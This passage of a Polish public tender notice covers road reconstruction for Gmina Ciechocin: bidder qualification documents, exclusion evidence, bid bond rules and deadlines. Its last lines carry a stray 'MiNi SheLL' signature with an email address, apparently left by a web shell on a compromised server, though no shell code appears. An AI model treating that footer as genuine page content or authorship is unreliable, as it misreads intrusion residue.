odpowiadające im ważne uprawnienia wydane na<br/>podstawie wcześniej obowiązujących przepisów, lub odpowiadające im uprawnienia budowlane,<br/>które zostały wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz<br/>Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy z dnia 7<br/>lipca 1994 r. Prawo budowlane (t.j. Dz. U. z 2020 r. poz. 1333 z późn. zm.) oraz ustawy z dnia<br/>22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej (Dz. U. z 2020 r. poz. 220 z późn. zm.).<br/>- Sytuacji ekonomicznej i finansowej:<br/>Zamawiający nie precyzuje w tym zakresie żadnych warunków, których spełnienie Wykonawca<br/>zobowiązany jest wykazać w sposób szczególny.<br/>- Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie żadnych warunków, których spełnienie Wykonawca<br/>zobowiązany jest wykazać w sposób szczególny. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o<br/>braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o<br/>ochronie konkurencji i konsumentów (Dz. U. z 2019 r. poz. 369), z innym wykonawcą, który złożył<br/>odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w<br/>postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. 2.<br/>Informacja z Krajowego Rejestru Karnego w zakresie dotyczącym podstaw wykluczenia wskazanych w<br/>art. 108 ust. 1 pkt 1, 2 i 4 ustawy sporządzona nie wcześniej niż 6 miesięcy przed jej złożeniem;3.<br/>Informacja z Centralnego Rejestru Beneficjentów Rzeczywistych w zakresie podstawy wykluczenia<br/>wskazanej w art. 108 ust. 2 ustawy, jeżeli odrębne przepisy wymagają wpisu do tego rejestru,<br/>sporządzona nie wcześniej niż 3 miesiące przed jej złożeniem;4. Zaświadczenie właściwego<br/>naczelnika Urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust. 1 pkt 1 ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego<br/>złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem<br/>zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu<br/>składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania<br/>ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub<br/>zawarł wiążące porozumienie w sprawie spłat tych należności; 5. Zaświadczenie albo innego<br/>dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia<br/>Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia<br/>społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy ustawy, wystawionego nie wcześniej niż<br/>3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia<br/>społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia<br/>dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o<br/>dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca<br/>dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub<br/>grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności; 6. Odpisu lub informacji<br/>z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty<br/>te zostały wykonane, stanowiący oświadczenie zgodne z treścią Załącznika nr 5 do SWZ–<br/>Doświadczenie Wykonawcy;2. Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie<br/>robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych i uprawnień<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami, stanowiący oświadczenie<br/>zgodne z treścią Załącznika nr 6 do SWZ – Potencjał Kadrowy;</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, ww. oświadczenia<br/>składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Dokumenty te<br/>potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w<br/>zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu oraz brak podstaw wykluczenia.<br/>Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów musi udowodnić<br/>Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji zmówienia - zobowiązanie powinno być<br/>podpisane przez osoby upoważnione do reprezentowania tych podmiotów.<br/>Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia<br/>wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich<br/>zasoby, warunków udziału w postępowaniu zamieszcza informacje o tych podmiotach w<br/>oświadczeniach (Aktualne na dzień składania ofert oświadczenie dotyczące spełniania<br/>warunków udziału w postępowaniu stanowiące wstępne potwierdzenie, że Wykonawca spełnia<br/>warunki udziału w postępowaniu, zgodne z treścią Załącznika nr 3 do SWZ; Aktualne na dzień<br/>składania ofert oświadczenie dotyczące przesłanek wykluczenia z postępowania stanowiące<br/>wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu z udziału w postępowaniu,<br/>zgodne z treścią Załącznika nr 4 do SWZ)<br/>Wykonawca, który zamierza powierzyć wykonanie części zamówienia podwykonawcom, w celu<br/>wykazania braku istnienia wobec nich podstaw wykluczenia z udziału w postępowaniu<br/>zamieszcza informacje o podwykonawcach w oświadczeniu, o którym mowa w pkt dotyczącym<br/>przesłanek wykluczenia.<br/>7W sytuacji, gdy Wykonawca zamierza zastosować inne materiały, urządzenia i wyposażenie<br/>niż podane w dokumentacji projektowej (materiały, urządzenia i wyposażenie równoważne),<br/>winien dołączyć do oferty wypełniony Wykaz oferowanych rozwiązań równoważnych - Załącznik<br/>nr 9 do SWZ, zawierający materiały, urządzenia i wyposażenie zawarte w dokumentacji<br/>projektowej oraz podać ich równoważniki (nazwy materiałów, urządzeń i wyposażenia<br/>zaproponowanych w ofercie, oferowane parametry/cechy techniczne i jakościowe, typ, model i<br/>producenta).<br/>W celu udokumentowania równoważności zaproponowanych rozwiązań do wykazu należy<br/>dołączyć: karty katalogowe, rysunki i opisy, umożliwiające Zamawiającemu ocenę oferty. Dowód<br/>wniesienia wadium (oryginał gwarancji lub poręczenia w postaci elektronicznej jeśli<br/>wadium wnoszone jest w formie gwarancji lub poręczenia).<br/>Dokumenty z których wynika prawo do podpisania oferty: odpis lub informacja<br/>z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej lub innego właściwego rejestru, pełnomocnictwo lub inny dokument<br/>potwierdzający umocowanie do reprezentowania Wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany do wniesienia wadium: Ustala się wadium dla całości przedmiotu<br/>zamówienia w wysokości: 5 000,00 zł, słownie: pięć tysięcy złotych 00/100. Wadium wnosi się<br/>przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu<br/>związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2<br/>ustawy Pzp.Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku<br/>następujących formach:pieniądzu, przelewem na rachunek bankowy Zamawiającego: Bank<br/>Spółdzielczy Grębocin nr rachunku 39 9491 0003 0030 0012 0489 0002, poręczeniach<br/>bankowych lub poręczeniach spółdzielczej kasy oszczednościowo-kredytowej, z tym że<br/>poręczenie kasy jest zawsze poręczeniem pieniężnym,gwarancjach bankowych,gwarancjach<br/>ubezpieczeniowych,poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5<br/>pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju<br/>Przedsiębiorczości (t.j. Dz. U. z 2020 r. poz. 299 z późn. zm.).10.4. Wadium wniesione w<br/>pieniądzu musi być na koncie Zamawiającego przed upływem terminu składania ofert. Na<br/>poleceniu przelewu należy wpisać: Wadium – „Przebudowa dróg gminnych w miejscowości Świętosław, Ciechocin i Elgiszewo". Kopię dokumentu potwierdzającego<br/>dokonanie przelewu wadium należy dołączyć do<br/>oferty. Ze względu na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych,<br/>Zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem.Wadium wniesione w<br/>pieniądzu, Zamawiający zwróci wraz z odsetkami wynikającymi z umowy rachunku bankowego,<br/>na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego<br/>oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez<br/>Wykonawcę.Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w<br/>oryginale. W przypadku wniesienia wadium w formie gwarancji lub poręczenia, taka gwarancja<br/>lub poręczenie musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę<br/>wadium przez Wykonawcę, określone w art. 46 ust. 4a i 5 ustawy Pzp. Z treści gwarancji lub<br/>poręczenia winno wynikać nieodwołalne i bezwarunkowe zobowiązanie Gwaranta lub<br/>Poręczyciela na pierwsze pisemne wezwanie Zamawiającego do zapłaty kwoty pieniężnej, w<br/>wysokości odpowiadającej kwocie wadium określonej w pkt 11.1.Wadium wnoszone w formie<br/>poręczeń lub gwarancji musi spełniać co najmniej poniższe wymagania:musi<br/>obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez<br/>Wykonawcę określone w ustawie Pzp, bez potwierdzania tych okoliczności;z jej treści powinno<br/>jednoznacznie<br/>wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium;powinno być nieodwołalne i<br/>bezwarunkowe oraz płatne na pierwsze żądanie;termin obowiązywania poręczenia lub gwarancji<br/>nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem<br/>związania ofertą jest dzień składania ofert); w treści poręczenia lub gwarancji powinna znaleźć<br/>się nazwa oraz numer przedmiotowego postępowania;beneficjentem poręczenia lub gwarancji<br/>jest: Gmina Ciechocin, Ciechocin 172, 87-408 Ciechocin;w przypadku Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia Zamawiający wymaga aby poręczenie lub gwarancja<br/>obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało,<br/>że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum);musi zostać złożone w postaci elektronicznej, opatrzone kwalifikowanym<br/>podpisem elektronicznym przez wystawcę poręczenia lub gwarancji. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty w postaci elektronicznej.Oświadczenia i dokumenty potwierdzające brak<br/>podstaw do wykluczenia z postępowania, w tym oświadczenie dotyczące przynależności lub<br/>braku przynależności do tej samej grupy kapitałowej, składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie.Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>wskazują w formularzu oferty, które usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami wzoru umowy, który stanowi załącznik do SWZ oraz zakresie uregulowanym w art. 454 – 455 ustawy Pzp <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-28 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/ciechocin</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-28 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ofertę sporządza się w języku polskim na Formularzu Ofertowym - zgodnie z Załącznikiem nr 1<br/>do SWZ. Wraz z ofertą Wykonawca jest zobowiązany złożyć:- Oświadczenie Wykonawcy<br/>dotyczące spełniania warunków w postępowaniu – Załącznik nr 3 (W przypadku wspólnego<br/>ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepoleganiu wykluczeniu<br/>składa każdy z Wykonawców).- Oświadczenie Wykonawcy dotyczące przesłanek wykluczenia z<br/>postępowania Załącznik nr 4 (W przypadku wspólnego ubiegania się o zamówienie przez<br/>Wykonawców, oświadczenie o niepoleganiu wykluczeniu składa każdy z Wykonawców). -<br/>Zobowiązanie innego podmiotu do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji zamówienia – załącznik nr 8;- W sytuacji, gdy Wykonawca zamierza<br/>zastosować inne materiały, urządzenia i wyposażenie inne niż podane w dokumentacji<br/>projektowej (materiały, urządzenia i wyposażenie równoważne), winien dołączyć do oferty<br/>wypełniony wykaz oferowanych rozwiązań równoważnych – załącznik nr 9. - dowód wniesienia<br/>wadium (w przypadku wadium złożonego w formie poręczeń lub gwarancji);- dokumenty, z<br/>których wynika prawo do podpisania oferty; tj. odpis lub informacja z Krajowego Rejestru<br/>Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej, odpowiednie<br/>pełnomocnictwa (jeżeli dotyczy).- Oferta oraz pozostałe oświadczenia i dokumenty, dla których<br/>Zamawiający określił wzory w formie formularzy zamieszczonych w załącznikach do SWZ,<br/>powinny być sporządzone zgodnie z tymi wzorami.- W przypadku gdy oferta nie została<br/>podpisana przez osobę uprawnioną do reprezentacji Wykonawcy określoną w odpowiednim<br/>rejestrze lub innym dokumencie właściwym dla danej formy organizacyjnej Wykonawcy, do<br/>oferty należy dołączyć dokument pełnomocnictwa, złożony w postaci elektronicznej, opatrzony<br/>kwalifikowanym podpisem elektronicznym lub elektronicznej kopii, poświadczonej<br/>kwalifikowanym podpisem elektronicznym przez notariusza.- Ofertę sporządza się, pod rygorem<br/>nieważności, w formie elektronicznej (podpisanej kwalifikowanym podpisem elektronicznym).- W<br/>celu złożenia oferty należy zarejestrować (zalogować) się na Platformie oraz postępując zgodnie<br/>z instrukcją lub filmem instruktażowym przesłać ofertę w systemie. - Jeśli oferta zawiera<br/>informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16.04.1993 r. o<br/>zwalczaniu nieuczciwej konkurencji (Dz. U. z 2019 r. poz. 1010 ze zm.), Wykonawca powinien<br/>nie później niż w terminie składania ofert, zastrzec, że nie mogą one być udostępnione oraz<br/>wykazać, iż zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Zastrzeżone<br/>informacje należy złożyć w wydzielonym i odpowiednio oznaczonym pliku.- Wszystkie koszty<br/>związane z uczestnictwem w postępowaniu, w szczególności z przygotowaniem i złożeniem<br/>ofert ponosi Wykonawca składający ofertę. Zamawiający nie przewiduje zwrotu kosztów udziału<br/>w postępowaniu.- Dokumenty lub oświadczenia, o których mowa w rozporządzeniu w sprawie<br/>dokumentów, sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.

Creat By MiNi SheLL
Email: jattceo@gmail.com